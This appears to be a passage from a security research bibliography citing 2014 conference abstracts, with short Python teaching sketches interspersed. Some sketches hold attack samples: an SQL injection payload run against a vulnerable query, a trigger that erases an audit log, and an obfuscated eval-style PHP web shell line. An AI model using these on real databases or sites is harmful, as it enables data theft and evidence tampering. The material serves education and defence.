Keywords: public key cryptography; blind signcryption scheme; communication overhead; confidentiality; elliptic curves cryptosystem; forward secrecy; m-commerce; message integrity; message unlink-ability; mobile phone voting; sender anonymity; signer nonrepudiation; unforgeability; Digital signatures; Elliptic curve cryptography; Elliptic curves; Equations; Mobile handsets; Anonymity; Blind Signature; Blind Signcryption; Elliptic curves; Signcryption (ID#: 14-3391)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6861332&isnumber=6861314
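
The paper's scheme is elliptic-curve based; as a simpler self-contained illustration of the blinding idea such schemes build on, here is the textbook Chaum RSA blind signature with deliberately tiny, insecure parameters (requires Python 3.8+ for pow(r, -1, n)). This is a classroom sketch, not the authors' construction.

    import math, random

    # Toy RSA key: n = 61 * 53, with e*d = 1 mod phi(n). Insecure by design.
    n, e, d = 3233, 17, 2753

    def blind(m, r):
        """Requester hides message m with random factor r before sending."""
        return (m * pow(r, e, n)) % n

    def sign(blinded):
        """Signer signs without ever learning m (the 'blind' property)."""
        return pow(blinded, d, n)

    def unblind(s_blinded, r):
        """Stripping the factor yields an ordinary signature on m."""
        return (s_blinded * pow(r, -1, n)) % n

    m = 1234
    r = random.randrange(2, n)
    while math.gcd(r, n) != 1:
        r = random.randrange(2, n)

    sig = unblind(sign(blind(m, r)), r)
    assert sig == pow(m, d, n)       # identical to a direct signature on m
    assert pow(sig, e, n) == m       # verifies under the public key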


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Information Security for South Africa

Information Security for South Africa


The conference on Information Security for South Africa (ISSA), 2014, was held 13-14 August 2014 in Johannesburg, South Africa. The 2014 conference was held under the auspices of the University of Johannesburg Academy for Computer Science and Software Engineering, the University of South Africa School of Computing, and the University of Pretoria Department of Computer Science. The works cited here are more technical and general in nature and do not include the many excellent papers focused on issues unique to South Africa.

 

Valjarevic, Aleksandar; Venter, Hein S.; Ingles, Melissa, "Towards a Prototype For Guidance And Implementation Of A Standardized Digital Forensic Investigation Process," Information Security for South Africa (ISSA), 2014, pp.1,8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950488 Performing a digital forensic investigation requires a standardized and formalized process to be followed. There is currently neither an international standard formalizing such a process nor a global, harmonized digital forensic investigation process, and no application exists to guide a digital forensic investigator in efficiently implementing such a process. This paper proposes the implementation of such a prototype to cater to this need. A comprehensive and harmonized digital forensic investigation process model, proposed by the authors in previous work, is used as the basis of the prototype. The prototype takes the form of a software application with two main functionalities. The first is to act as an expert system that can be used for guidance and for training novice investigators. The second is to enable reliable logging of all actions taken within the processes proposed in the comprehensive and harmonized digital forensic investigation process model; ultimately, this functionality enables validation that a proper process was used. The benefits of such a prototype include possible improvements in the efficiency and effectiveness of an investigation, since clear guidelines are provided for following the process over the course of the investigation, and easier training of novice investigators. The last, and possibly most important, benefit is higher admissibility of digital evidence, as well as of the results and conclusions of digital forensic investigations, because it becomes easier to show that the correct standardized process was followed.

Keywords: Analytical models; Cryptography; Irrigation; ISO/IEC 27043; digital forensic investigation process model; digital forensics; harmonization; implementation prototype; standardization (ID#: 14-3404)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950488&isnumber=6950479

 

Trenwith, Philip M.; Venter, Hein S., "A Digital Forensic Model For Providing Better Data Provenance In The Cloud," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950489 The cloud has made digital forensic investigations exceedingly difficult because data may be spread over an ever-changing set of hosts and data centres. The normal search-and-seizure approach that digital forensic investigators tend to follow does not scale well in the cloud, because it is difficult to identify the physical devices on which data resides; in addition, the location of these devices is often unknown or unreachable. A solution to identifying the physical device can be found in data provenance. Similar to the tags in an email header that indicate where the email originated, a tag added to data as it is passed on by nodes in the cloud identifies where the data came from. If such a trace can be provided for data in the cloud, it may ease the investigation process by indicating where the data can be found. In this research the authors propose a model that, through the use of data provenance, aims to identify the physical location of data, both where it originated and where it has been as it passes through the cloud. The data provenance records provide digital investigators with a clear record of where the data has been and where it can be found in the cloud.

Keywords: Cloud computing; Computational modeling; Computers; Digital forensics; Open systems; Protocols; Servers; Cloud Computing; Digital Forensic Investigation; Digital Forensics; annotations; bilinear pairing technique; chain of custody; data provenance (ID#: 14-3405)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950489&isnumber=6950479
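
A minimal sketch of the kind of provenance tagging the model envisages: each cloud node that handles a data object appends a hash-chained record of where the data was and when. The field names are illustrative assumptions, not the paper's format, and the chain is merely hashed rather than cryptographically signed.

    import hashlib, json, time

    def add_provenance(tags, node_id, location):
        prev_hash = tags[-1]["hash"] if tags else "genesis"
        record = {
            "node": node_id,        # which host touched the data
            "location": location,   # physical location of that host
            "time": time.time(),
            "prev": prev_hash,      # chain to the previous record
        }
        record["hash"] = hashlib.sha256(
            json.dumps(record, sort_keys=True).encode()).hexdigest()
        return tags + [record]

    tags = []
    tags = add_provenance(tags, "node-a", "Johannesburg, ZA")
    tags = add_provenance(tags, "node-b", "Frankfurt, DE")

    # An investigator can replay the chain to see where the data has been;
    # any edit to an earlier record breaks the hash links.
    for t in tags:
        print(t["node"], t["location"], t["hash"][:12])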

 

Mpofu, Nkosinathi; van Staden, Wynand JC, "A Survey Of Trust Issues Constraining The Growth Of Identity Management-as-a-Service (IdMaaS)," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950490 Identity management-as-a-service (IdMaaS) is a cloud computing service in which the identity management function is moved to the cloud, streamlining the responsibilities of an organisation's computing or IT department. IdMaaS's attractiveness rests on reduced cost of ownership, little to no capital investment, scalability, self-service, location independence, and rapid deployment; however, its growth has been impeded by issues mostly related to security, privacy, and trust. Most organisations view identities as passports to key computing resources (hardware, software, and data), and as such view identity management as a core IT function that must remain within their sphere of control. This paper discusses IdMaaS and surveys the major trust issues in existing cloud computing environments that threaten its growth. Highlighting these trust issues lays a foundation for subsequent research directed at addressing them and therefore at enhancing the growth of IdMaaS. The growth of IdMaaS will, in turn, open a new entrepreneurial avenue for service providers while enabling IdMaaS consumers to realise the benefits that come with cloud computing. In future work, we will analyse and evaluate the extent of the impact each trust issue poses to IdMaaS.

Keywords: Authentication; Authorization; Availability; Cloud computing; identity management; identity management-as- as-service; trust (ID#: 14-3406)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950490&isnumber=6950479

 

Mumba, Emilio Raymond; Venter, H.S., "Mobile Forensics Using The Harmonised Digital Forensic Investigation Process," Information Security for South Africa (ISSA), 2014, pp.1,10, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950491 Mobile technology is among the fastest-developing technologies that have changed the way we live our daily lives. Over the past few years, mobile devices have become the most popular form of communication around the world. However, bundled together with these good and advanced capabilities, mobile devices can also be used to perform activities that are malicious or criminal in nature. This makes mobile devices a valuable source of digital evidence. For this reason, the technological evolution of mobile devices has raised the need to develop standardised investigation process models and procedures within the field of digital forensics. This need is reinforced by the fact that forensic examiners and investigators face challenges when acquiring data from mobile devices in a forensically sound manner. This paper, therefore, aims at testing the harmonised digital forensic investigation process through a case study of a mobile forensic investigation. More specifically, an experiment was conducted to test the performance of the harmonised digital forensic investigation process (HDFIP), as stipulated in the ISO/IEC 27043 draft international standard, through the extraction of potential digital evidence from mobile devices.

Keywords: ISO standards; Performance evaluation; Harmonised Digital Forensic Investigation Process (HDFIP); ISO/IEC 27043;mobile device; mobile forensics (ID#: 14-3407)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950491&isnumber=6950479

 

Schnarz, Pierre; Fischer, Clemens; Wietzke, Joachim; Stengel, Ingo, "On a Domain Block Based Mechanism To Mitigate DoS Attacks On Shared Caches In Asymmetric Multiprocessing Multi Operating Systems," Information Security for South Africa (ISSA), 2014, pp.1,8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950494 Asymmetric multiprocessing (AMP) based multi-OSs are going to be established in the future to enable parallel execution of different functionalities while fulfilling requirements for real-time operation, reliability, trustworthiness, and security. Especially for in-car multimedia systems, also known as In-Vehicle Infotainment (IVI) systems, the composition of different OS types on a system-on-chip (SoC) offers a wide variety of advantages in embedded system development. However, the asymmetric paradigm, which implies the division and assignment of every hardware resource to OS domains, is not applicable to every part of an SoC. Caches are often shared between multiple processors on multiprocessor SoCs (MP-SoCs). Because of the caches' association with the main memory, OSs running on the processor cores are naturally vulnerable to DoS attacks: an adversary who has compromised one of the OS domains can attack an arbitrary memory location of a co-OS domain, degrading the performance of the victim's memory accesses. In this work a method is proposed which removes the surface for interference introduced by the association of cache and main memory. The contribution of this article is therefore twofold. First, it introduces an attack vector, derived as an algorithm from the cache way associativity, to affect the co-OSs running on the same platform; using this vector, it is shown that mapping contiguous memory blocks intensifies the effect. Second, a memory mapping method is proposed which mitigates these interference effects. The approach is evaluated with a proof-of-concept implementation that illustrates the performance impact of the attack and the countermeasure, respectively. The method enables a more reliable implementation of AMP-based multi-OSs on MP-SoCs using shared caches, without the need to modify the hardware layout.

Keywords: Computer architecture; Computer crime; Hardware; Interference; Program processors; System-on-chip; Vectors (ID#: 14-3408)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950494&isnumber=6950479
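
Both the interference surface and the mitigation come down to simple address arithmetic. The sketch below shows how a physical address maps to a cache set, and how page coloring (one common realization of this style of memory-mapping mitigation) can give OS domains disjoint sets; the cache geometry is an example, not that of any specific SoC.

    LINE_SIZE = 64       # bytes per cache line
    NUM_SETS  = 2048     # e.g. a 2 MiB, 16-way cache: 2**21 / (64 * 16)
    PAGE_SIZE = 4096

    def cache_set(addr):
        """Addresses that share this index compete for the same set,
        which is what lets one OS domain evict a co-domain's lines."""
        return (addr // LINE_SIZE) % NUM_SETS

    def page_color(addr):
        """Color = the part of the set index fixed by the page frame
        number. Giving each OS domain disjoint colors keeps its data in
        disjoint cache sets, removing the interference surface."""
        sets_per_page = PAGE_SIZE // LINE_SIZE        # 64 sets per page
        return (addr // PAGE_SIZE) % (NUM_SETS // sets_per_page)

    # Pages of different colors can never evict each other's lines:
    a, b = 0x0000, 0x1000
    print(page_color(a), page_color(b))   # 0 1, so the sets are disjoint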

 

Wrench, Peter M.; Irwin, Barry V.W., "Towards a Sandbox For The Deobfuscation And Dissection of PHP Malware," Information Security for South Africa (ISSA), 2014, pp. 1, 8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950504 The creation and proliferation of PHP-based Remote Access Trojans (or web shells) used in both the compromise and post exploitation of web platforms has fuelled research into automated methods of dissecting and analysing these shells. Current malware tools disguise themselves by making use of obfuscation techniques designed to frustrate any efforts to dissect or reverse engineer the code. Advanced code engineering can even cause malware to behave differently if it detects that it is not running on the system for which it was originally targeted. To combat these defensive techniques, this paper presents a sandbox-based environment that aims to accurately mimic a vulnerable host and is capable of semi-automatic semantic dissection and syntactic deobfuscation of PHP code.

Keywords: Arrays; Databases; Decoding; Malware; Process control; Semantics; Software; Code deobfuscation; Reverse engineering; Sandboxing (ID#: 14-3409)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950504&isnumber=6950479
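
A minimal sketch of the syntactic deobfuscation step: many PHP web shells wrap their payload in nested base64_decode()/eval() calls, which can be peeled statically before any sandboxed execution. The regex and sample shell below are illustrative only; real shells require far more robust parsing than a single pattern.

    import base64, re

    SAMPLE = "eval(base64_decode('ZWNobyAicHduZWQiOw=='));"

    PATTERN = re.compile(r"base64_decode\('([A-Za-z0-9+/=]+)'\)")

    def peel(code, max_rounds=10):
        """Replace base64_decode('...') literals with their decoded
        contents until no such obfuscation layer remains."""
        for _ in range(max_rounds):
            m = PATTERN.search(code)
            if not m:
                break
            decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
            code = code[:m.start()] + repr(decoded) + code[m.end():]
        return code

    print(peel(SAMPLE))   # -> eval('echo "pwned";');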

 

Ophoff, Jacques; Robinson, Mark, "Exploring End-User Smartphone Security Awareness Within A South African Context," Information Security for South Africa (ISSA), 2014, pp.1, 7, 13-14 Aug. 2014

doi: 10.1109/ISSA.2014.6950500 International research has shown that users are complacent when it comes to smartphone security behaviour. This is contradictory, as users perceive data stored on the ‘smart’ devices to be private and worth protecting. Traditionally less attention is paid to human factors compared to technical security controls (such as firewalls and antivirus), but there is a crucial need to analyse human aspects as technology alone cannot deliver complete security solutions. Increasing a user's knowledge can improve compliance with good security practices, but for trainers and educators to create meaningful security awareness materials they must have a thorough understanding of users' existing behaviours, misconceptions and general attitude towards smartphone security.

Keywords: Androids; Context; Humanoid robots; Portable computers; Security; Awareness and Training in Security; Mobile Computing Security; Smartphone (ID#: 14-3410)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950500&isnumber=6950479

 

Hauger, Werner K.; Olivier, Martin S., "The Role Of Triggers In Database Forensics," Information Security for South Africa (ISSA), 2014, pp.1, 7, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950506 An aspect of database forensics that has not received much attention in the academic research community yet is the presence of database triggers. Database triggers and their implementations have not yet been thoroughly analysed to establish what possible impact they could have on digital forensic analysis methods and processes. Conventional database triggers are defined to perform automatic actions based on changes in the database. These changes can be on the data level or the data definition level. Digital forensic investigators might thus feel that database triggers do not have an impact on their work. They are simply interrogating the data and metadata without making any changes. This paper attempts to establish if the presence of triggers in a database could potentially disrupt, manipulate or even thwart forensic investigations. The database triggers as defined in the SQL standard were studied together with a number of database trigger implementations. This was done in order to establish what aspects might have an impact on digital forensic analysis. It is demonstrated in this paper that some of the current database forensic analysis methods are impacted by the possible presence of certain types of triggers in a database. Furthermore, it finds that the forensic interpretation and attribution processes should be extended to include the handling and analysis of database triggers if they are present in a database.

Keywords: Databases; Dictionaries; Forensics; Irrigation; Monitoring; Reliability; database forensics; database triggers; digital forensic analysis; methods; processes (ID#: 14-3411)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950506&isnumber=6950479
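
The concern is easy to demonstrate. In the self-contained SQLite session below, an ordinary UPDATE fires a trigger that silently rewrites the audit trail, so an investigator who merely reads the data may already be looking at trigger-altered evidence. The table and trigger names are invented for the demo.

    import sqlite3

    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE payments(id INTEGER PRIMARY KEY, amount REAL);
        CREATE TABLE audit_log(entry TEXT);

        -- A hostile trigger: every payment update scrubs the audit
        -- trail, thwarting later attribution.
        CREATE TRIGGER scrub AFTER UPDATE ON payments
        BEGIN
            DELETE FROM audit_log;
            INSERT INTO audit_log VALUES ('nothing to see here');
        END;
    """)
    db.execute("INSERT INTO payments VALUES (1, 100.0)")
    db.execute("INSERT INTO audit_log VALUES ('payment 1 created')")
    db.execute("UPDATE payments SET amount = 999.0 WHERE id = 1")

    print(db.execute("SELECT * FROM audit_log").fetchall())
    # [('nothing to see here',)] -- the original log entry is gone, so a
    # forensic process must enumerate and analyse triggers, not just data.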

 

Savola, Reijo M.; Kylanpaa, Markku, "Security Objectives, Controls And Metrics Development For An Android Smartphone Application," Information Security for South Africa (ISSA), 2014, pp.1,8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950501 Security in Android smartphone platforms deployed in public safety and security mobile networks is a remarkable challenge. We analyse the security objectives and controls for these systems based on an industrial risk analysis. The target system of the investigation is an Android platform utilized for a public safety and security mobile network. We analyse how security decision-making for this target system can be supported by effective and efficient security metrics. In addition, we describe implementation details of the security controls for the authorization and integrity objectives of a demonstration of the target system.

Keywords: Authorization; Libraries; Monitoring; Android; risk analysis; security effectiveness; security metrics; security objectives (ID#: 14-3412)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950501&isnumber=6950479

 

Haffejee, Jameel; Irwin, Barry, "Testing Antivirus Engines To Determine Their Effectiveness As A Security Layer," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950496 This research was undertaken to empirically test the assumption that it is trivial to bypass an antivirus application, and to gauge the effectiveness of antivirus engines when faced with a number of known evasion techniques. A known malicious binary was combined with evasion techniques and deployed against several antivirus engines to test their detection ability. The research also documents the process of setting up an environment for testing antivirus engines, as well as building the evasion techniques used in the tests. This environment facilitated the empirical testing needed to determine whether the assumption that antivirus security controls can easily be bypassed holds. The results of the empirical tests are presented and demonstrate that it is indeed within reason that an attacker can evade multiple antivirus engines without much effort. As such, while an antivirus application is useful for protecting against known threats, it does not work as effectively against unknown threats.

Keywords: Companies; Cryptography; Engines; Malware; Payloads; Testing; Antivirus; Defense; Malware (ID#: 14-3413)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950496&isnumber=6950479

 

van Staden, Wynand JC, "An Investigation Into Reducing Third Party Privacy Breaches During The Investigation Of Cybercrime," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950503 In this article we continue previous work in which a framework was proposed for preventing or limiting privacy breaches of third parties during the investigation of cybercrime. Investigations may be conducted internally (by the enterprise) or externally (by a third party or a law enforcement agency), depending on the jurisdiction and context of the case. In many cases, an enterprise will conduct an internal investigation of some allegation of wrongdoing by an employee or a client. In these cases, maintaining the privacy promise made to other clients or customers is an ideal the enterprise may wish to honour, especially if the image or brand of the enterprise may be affected when the details of the investigative process become known. The article reports on the results of the implementation of the privacy breach detection; it also includes lessons learned and proposes further steps for refining the breach detection techniques and methods for future digital forensic investigations.

Keywords: Business; Context; Digital forensics; Electronic mail; Indexes; Postal services; Privacy; Cybercrime; Digital Forensics; Privacy; Privacy Breach; Third Party Privacy (ID#: 14-3414)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950503&isnumber=6950479

 

Mirza, Abdul; Senekane, Makhamisa; Petruccione, Francesco; van Niekerk, Brett, "Suitability of Quantum Cryptography For National Facilities," Information Security for South Africa (ISSA), 2014, pp.1, 7, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950513 Quantum cryptography, or more accurately Quantum Key Distribution (QKD), provides a secure mechanism to exchange encryption keys which can detect potential eavesdroppers. However, this is a relatively new technology in terms of implementation, and there are some concerns over possible attacks. This paper describes QKD and provides an overview of the implementations in South Africa. From this, a basic vulnerability assessment is performed to determine the suitability of QKD for use in critical national facilities. While there are vulnerabilities, some of these can be easily mitigated through proper design and planning. The implementation of QKD as an additional layer to the encryption process may serve to improve the security between national key points.

Keywords: Cryptography; Educational institutions; Quantum mechanics; TV; critical infrastructure protection; quantum cryptography; quantum key distribution; vulnerability assessment (ID#: 14-3415)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950513&isnumber=6950479
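
The eavesdropper-detection property the abstract mentions rests on basis sifting, which a few lines of Python can simulate conceptually (real QKD happens in optics, not software). With an intercept-resend eavesdropper, the error rate on the sifted key rises to roughly 25%, which is what the endpoints test for.

    import random

    N = 2000
    alice_bits  = [random.randint(0, 1) for _ in range(N)]
    alice_bases = [random.choice("+x") for _ in range(N)]
    bob_bases   = [random.choice("+x") for _ in range(N)]
    EVE_PRESENT = True

    bob_bits = []
    for bit, a_basis, b_basis in zip(alice_bits, alice_bases, bob_bases):
        if EVE_PRESENT:                  # intercept-resend attack
            e_basis = random.choice("+x")
            bit = bit if e_basis == a_basis else random.randint(0, 1)
            a_basis = e_basis            # photon is re-sent in Eve's basis
        bob_bits.append(bit if b_basis == a_basis else random.randint(0, 1))

    # Sifting: keep only positions where Alice's and Bob's bases matched.
    sifted = [(a, b) for a, b, x, y in
              zip(alice_bits, bob_bits, alice_bases, bob_bases) if x == y]
    errors = sum(a != b for a, b in sifted) / len(sifted)
    print("sifted bits:", len(sifted), "error rate: %.1f%%" % (100 * errors))
    # ~25% error rate reveals Eve; without her it would be ~0%.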

 

du Plessis, Warren P., "Software-Defined Radio (SDR) As A Mechanism For Exploring Cyber-Electronic Warfare (EW) Collaboration," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950516 Cyber is concerned with networks of systems in all their possible forms. Electronic warfare (EW) is focused on the many different uses of the electromagnetic spectrum (EMS). Given that many networks make use of the EMS (wireless networks), there is clearly large scope for collaboration between the cyber-warfare and EW communities. Unfortunately, such collaboration is complicated by the significant differences between these two realms. Software-defined radio (SDR) systems are based on interfaces between the EMS and computers and thus offer tremendous potential for encouraging cyber-EW collaboration. The concept of SDR is reviewed along with some hardware and software SDR systems. These are then used to propose a number of projects where SDR systems allow collaboration between the cyber and EW realms to achieve effects which neither realm could achieve alone.

Keywords: Bandwidth; Collaboration; Computers; Hardware; Protocols; Software; Standards; Electronic warfare (EW); cyber; electromagnetic spectrum (EMS); software-defined radio (SDR) (ID#: 14-3416)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950516&isnumber=6950479

 

Tekeni, Luzuko; Thomson, Kerry-Lynn; Botha, Reinhardt A., "Concerns Regarding Service Authorization By IP Address Using Eduroam," Information Security for South Africa (ISSA), 2014, pp.1,6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950495 Eduroam is a secure WLAN roaming service between academic and research institutions around the globe. It allows users from participating institutions secure Internet access at any other participating visited institution using their home credentials. The authentication credentials are verified by the home institution, while authorization is done by the visited institution. The user receives an IP address in the range of the visited institution, and accesses the Internet through the firewall and proxy servers of the visited institution. However, access granted to services that authorize via an IP address of the visited institution may include access to services that are not allowed at the home institution, due to legal agreements. This paper looks at typical legal agreements with service providers and explores the risks and countermeasures that need to be considered when using eduroam.

Keywords: IEEE Xplore; Servers; Authorization; IP-Based; Service Level Agreement; eduroam (ID#: 14-3417)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950495&isnumber=6950479

 

Mouton, Francois; Malan, Mercia M.; Leenen, Louise; Venter, H.S., "Social Engineering Attack Framework," Information Security for South Africa (ISSA), 2014, pp.1,9, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950510 The field of information security is a fast-growing discipline. Even though the effectiveness of security measures to protect sensitive information is increasing, people remain susceptible to manipulation, and the human element is thus a weak link. A social engineering attack targets this weakness by using various manipulation techniques to elicit sensitive information. The field of social engineering is still in its infancy with regard to formal definitions and attack frameworks. This paper proposes a social engineering attack framework based on Kevin Mitnick's social engineering attack cycle. The framework addresses shortcomings of Mitnick's cycle and covers every step of a social engineering attack, from determining the goal of the attack up to its successful conclusion. The authors use a previously proposed social engineering attack ontological model, which provides a formal definition of a social engineering attack and contains all the components of such an attack; the attack framework presented in this paper is additionally able to represent temporal data such as flow and time. Furthermore, this paper demonstrates how historical social engineering attacks can be mapped to the framework. By combining the ontological model and the attack framework, one is able to generate social engineering attack scenarios and to map historical attacks to a standardised format. Scenario generation and analysis of previous attacks are useful for developing awareness, for training, and for developing countermeasures against social engineering attacks.

Keywords: Ash; Buildings; Data models; Electronic mail; Information security; Vectors; Bidirectional Communication; Indirect Communication; Mitnick's Attack Cycle; Ontological Model; Social Engineering; Social Engineering Attack; Social Engineering Attack Framework; Unidirectional Communication (ID#: 14-3418)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6950510&isnumber=6950479


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Signal Propagation and Computer Technology (ICSPCT) - India

Signal Propagation and Computer Technology (2014), India


The 2014 International Conference on Signal Propagation and Computer Technology (ICSPCT) was held 12-13 July 2014 at Ajmer, India. The technical program of IEEE ICSPCT 2014 comprised sessions on signal propagation (13), computer technology (9), and engineering professionals (2). The organizers received more than 650 paper submissions from 10 countries, of which 155 papers were accepted. The Science of Security-related papers are cited here.

 

Prakash, G.L.; Prateek, M.; Singh, I., "Data Encryption And Decryption Algorithms Using Key Rotations For Data Security In Cloud System," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.624,629, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884895 Outsourcing of data in cloud computing is growing exponentially as organizations scale up their hardware and software resources, and protecting outsourced sensitive data has become a major data security challenge in cloud computing. To address this challenge, we propose an efficient data encryption scheme that encrypts sensitive data before sending them to the cloud server. The scheme performs block-level data encryption using a 256-bit symmetric key with rotation. In addition, data users can reconstruct the requested data from the cloud server using a shared secret key. We analyze the privacy protection of outsourced data through experiments carried out on a repository of text files of variable size. The security and performance analysis shows that the proposed method is considerably more efficient than existing methods.

Keywords: cloud computing; cryptography; data protection; outsourcing; block level data encryption; cloud computing; cloud server; data decryption algorithms; data outsourcing; data security; hardware resources; key rotations; performance analysis; privacy protection; shared secret key; software resources; text files; variable size; Algorithm design and analysis; Computational modeling; Encoding; Encryption; Servers; Software; Data Block; Decryption; Encryption; Key Rotation; Outsource; Security (ID#: 14-3366)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884895&isnumber=6884878
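
A minimal sketch of block-level encryption with per-block key rotation in the spirit of the abstract. The derivation rule (k_i = SHA-256(master || block index)) and the use of AES-CTR are our assumptions, not the paper's exact algorithm; the sketch requires the third-party cryptography package.

    import hashlib, os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    BLOCK = 4096
    master = os.urandom(32)            # 256-bit symmetric master key

    def block_key(i):
        """Rotate the key per block: k_i = SHA-256(master || i)."""
        return hashlib.sha256(master + i.to_bytes(8, "big")).digest()

    def encrypt_blocks(data):
        out = []
        for i in range(0, len(data), BLOCK):
            nonce = os.urandom(16)
            enc = Cipher(algorithms.AES(block_key(i // BLOCK)),
                         modes.CTR(nonce)).encryptor()
            out.append((nonce, enc.update(data[i:i + BLOCK]) + enc.finalize()))
        return out

    def decrypt_blocks(blocks):
        plain = b""
        for i, (nonce, ct) in enumerate(blocks):
            dec = Cipher(algorithms.AES(block_key(i)),
                         modes.CTR(nonce)).decryptor()
            plain += dec.update(ct) + dec.finalize()
        return plain

    data = b"outsourced sensitive data" * 500
    assert decrypt_blocks(encrypt_blocks(data)) == data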

 

Duhan, N.; Saneja, B., "A Two Tier Defense Against SQL Injection," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.415,420, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884906 In recent years, with the increasing ubiquity and popularity of web-based applications, information systems are frequently migrated to the web, which can jeopardize the security and privacy of their users. One of the easiest and most hazardous attacks confronting these systems is the SQL injection attack (SQLIA), a method that inserts a malevolent query into the original query statement. In this paper, we demonstrate an efficient approach for securing web applications against SQL injection that combines client-side validation with identity-based cryptography. To validate the technique, we examine it on prototype web applications generated with web developer tools, showing that our approach is secure and efficient, and hypothesis testing is performed to validate the results.

Keywords: Internet; SQL; client-server systems; cryptography; data privacy; SQL injection attacks; Web based applications; Web developer tools; client side validation; hazardous security attacks; identity based cryptography; information systems; malevolent query; original query statement; two-tier defense; user privacy; user security; Cryptography; Educational institutions; IP networks ;Information filters; Libraries; Injection attack; SQL Injection; SQL Query; SQLIAs; Web application (ID#: 14-3367)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884906&isnumber=6884878
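
The paper's two tiers combine client-side validation with identity-based cryptography; as a baseline illustration of the injection mechanics any such defense must stop, the sketch below contrasts a concatenated query with a parameterized one (sqlite3 is used for self-containment; the idea is identical for PHP/MySQL stacks).

    import sqlite3

    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(name TEXT, pw TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")

    attack = "' OR '1'='1"

    # VULNERABLE: string concatenation lets the payload rewrite the query.
    rows = db.execute(
        "SELECT * FROM users WHERE name = '" + attack + "'").fetchall()
    print("concatenated query returned:", rows)      # every row leaks

    # SAFE: the driver binds the payload as a literal value, not as SQL.
    rows = db.execute(
        "SELECT * FROM users WHERE name = ?", (attack,)).fetchall()
    print("parameterized query returned:", rows)     # []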

 

Chatterjee, S.; Gupta, A.K.; Mahor, V.K.; Sarmah, T., "An Efficient Fine Grained Access Control Scheme Based On Attributes For Enterprise Class Applications," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.273,278, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6884907 Fine-grained access control is used to assign a unique access privilege to a particular user for accessing a particular enterprise-class application for which he or she is authorized. The existing mechanisms for restricting users' access to resources are mostly static and not fine-grained, and are not well suited for enterprise-class applications in which information access is dynamic and ad hoc in nature. As a result, we need an effective fine-grained access and authorization control scheme that controls access to objects by evaluating rules against the sets of attributes given for both users and application objects. In this paper, we propose a new attribute-based fine-grained access and authorization control scheme suitable for large enterprise-class applications. Its strength is that it provides fine-grained access control through an authorization architecture and policy formulation based on an attribute-based access tree. In comparison with the role-based access control (RBAC) approach, there is no need to explicitly define any roles; based on the user access tree, any user can get access to any particular application with full granularity.

Keywords: authorisation; business data processing; RBAC; attribute based access tree; authorization architecture; authorization control scheme; efficient fine grained access control scheme; enterprise class applications; policy formulation; role based access control; unique access privilege; user access tree; Cryptography; Logic gates; Safety (ID#: 14-3368)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6884907&isnumber=6884878
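
The core idea, decisions as predicates over user and object attributes with no roles defined anywhere, fits in a few lines. The attribute names and the sample policy below are invented for illustration; the paper's access tree generalizes the single AND node shown here.

    RULES = [
        # (description, predicate over user/object attribute dicts)
        ("own-department documents",
         lambda u, o: u["department"] == o["department"]),
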